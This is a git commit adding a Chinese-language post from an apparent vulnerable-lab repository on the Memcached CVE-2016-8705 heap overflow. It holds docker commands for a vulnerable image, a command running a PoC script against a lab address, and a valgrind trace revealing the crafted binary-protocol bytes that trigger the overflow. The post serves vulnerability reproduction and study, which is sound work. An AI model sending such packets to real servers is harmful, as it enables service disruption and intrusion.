(Add Vul: Memcached) CVE-2016-8705

2025-06-21 10:20:20 +00:00 · 2017-11-11 11:40:24 +08:00 · 2017-11-11 11:40:24 +08:00 · d4fa24a2a1
commit d4fa24a2a1
parent 0382c0d921
1 changed files with 114 additions and 0 deletions
--- a/_posts/2017-03-10-m_memcached_cve-2016-8705.md
+++ b/_posts/2017-03-10-m_memcached_cve-2016-8705.md
@ -0,0 +1,114 @@
+---
+layout: post
+title: "Memcached Server UPDATE 远程代码执行漏洞(CVE-2016-8705)"
+date: 2017-03-10 00:15:16 +0800
+image: '/assets/img/'
+description: 'Multiple integer overflows in processbinupdate function which is responsible for processing multiple commands of Memcached binary protocol can be abused to cause heap overflow and lead to remote code execution.'
+main-class: 'hole'
+color: '#B31917'
+tags:
+- Memcached
+- RCE
+categories:
+- Memcached
+twitter_text: 'Multiple integer overflows in processbinupdate function which is responsible for processing multiple commands of Memcached binary protocol can be abused to cause heap overflow and lead to remote code execution.'
+introduction: 'Multiple integer overflows in processbinupdate function which is responsible for processing multiple commands of Memcached binary protocol can be abused to cause heap overflow and lead to remote code execution.'
+---
+
+### 说明
+
+ 感谢 [@xing-xiao](https://github.com/xing-xiao) 提供原始环境。 #6
+
+### 漏洞信息
+
+ * [CVE-2106-8705漏洞信息](http://www.talosintelligence.com/reports/TALOS-2016-0220/)
+
+### 获取环境:
+
+1. 拉取镜像到本地
+ ```bash
+$ docker pull medicean/vulapps:m_memcached_CVE-2016-8705
+ ```
+
+2. 启动环境
+ ```bash
+$ docker run -d -p 11211:11211 medicean/vulapps:m_memcached_CVE-2016-8705
+ ```
+
+ > 如果需要追溯堆栈，需在启动时 valgrind 调试 memcached，则启动环境命令如下：
+
+ ```bash
+$ docker run -i -t -u root -p 11211:11211 medicean/vulapps:m_memcached_CVE-2016-8705 /valgrind.sh
+ ```
+ 
+### 使用国内阿里云镜像
+
+1. 拉取镜像到本地
+ ```bash
+$ docker pull registry.cn-hangzhou.aliyuncs.com/lo0o/memcached:1.4.32
+ ```
+
+2. 启动环境
+ ```bash
+$ docker run -d -p 11211:11211 registry.cn-hangzhou.aliyuncs.com/lo0o/memcached:1.4.32
+ ```
+
+### PoC
+
+1.获取目标 IP 地址与端口号，如：192.168.100.2 端口号为 11211
+
+2.执行 poc.py
+
+```bash
+$ python poc.py 192.168.100.2 11211
+```
+
+3.查看追溯堆栈结果
+
+```
+36: Client using the binary protocol
+<36 Read binary protocol data:
+<36    0x80 0x02 0x00 0xfa
+<36    0x08 0x00 0x00 0x00
+<36    0xff 0xff 0xff 0xd0
+<36    0x00 0x00 0x00 0x00
+<36    0x00 0x00 0x00 0x00
+<36    0x00 0x00 0x00 0x00
+36: going from conn_parse_cmd to conn_nread
+<36 ADD AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Value len is -306
+==8== Thread 3:
+==8== Invalid write of size 8
+==8==    at 0x4C326CB: memcpy@@GLIBC_2.14 (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
+==8==    by 0x4132C8: memcpy (string3.h:53)
+==8==    by 0x4132C8: do_item_alloc (items.c:238)
+==8==    by 0x40A15A: process_bin_update (memcached.c:2222)
+==8==    by 0x40A15A: complete_nread_binary (memcached.c:2427)
+==8==    by 0x40A15A: complete_nread (memcached.c:2484)
+==8==    by 0x40D367: drive_machine (memcached.c:4656)
+==8==    by 0x4E47A0B: event_base_loop (in /usr/lib/x86_64-linux-gnu/libevent-2.0.so.5.1.9)
+==8==    by 0x414874: worker_libevent (thread.c:380)
+==8==    by 0x52A26B9: start_thread (pthread_create.c:333)
+==8==  Address 0x5d1ae90 is 0 bytes after a block of size 1,048,512 alloc'd
+==8==    at 0x4C2DB8F: malloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
+==8==    by 0x40F9DF: memory_allocate (slabs.c:538)
+==8==    by 0x40F9DF: do_slabs_newslab (slabs.c:233)
+==8==    by 0x40FA6E: do_slabs_alloc (slabs.c:328)
+==8==    by 0x41007E: slabs_alloc (slabs.c:584)
+==8==    by 0x4131E6: do_item_alloc (items.c:180)
+==8==    by 0x40A15A: process_bin_update (memcached.c:2222)
+==8==    by 0x40A15A: complete_nread_binary (memcached.c:2427)
+==8==    by 0x40A15A: complete_nread (memcached.c:2484)
+==8==    by 0x40D367: drive_machine (memcached.c:4656)
+==8==    by 0x4E47A0B: event_base_loop (in /usr/lib/x86_64-linux-gnu/libevent-2.0.so.5.1.9)
+==8==    by 0x414874: worker_libevent (thread.c:380)
+==8==    by 0x52A26B9: start_thread (pthread_create.c:333)
+==8==
+```
+
+> 注意：
+>
+> 该 PoC 并不会造成服务端崩溃。
+
+### Exp
+
+> 暂无命令执行 Exp，如果你愿意分享该 Exp 可向本仓库发起 [Pull Request](https://github.com/Medicean/VulApps/compare)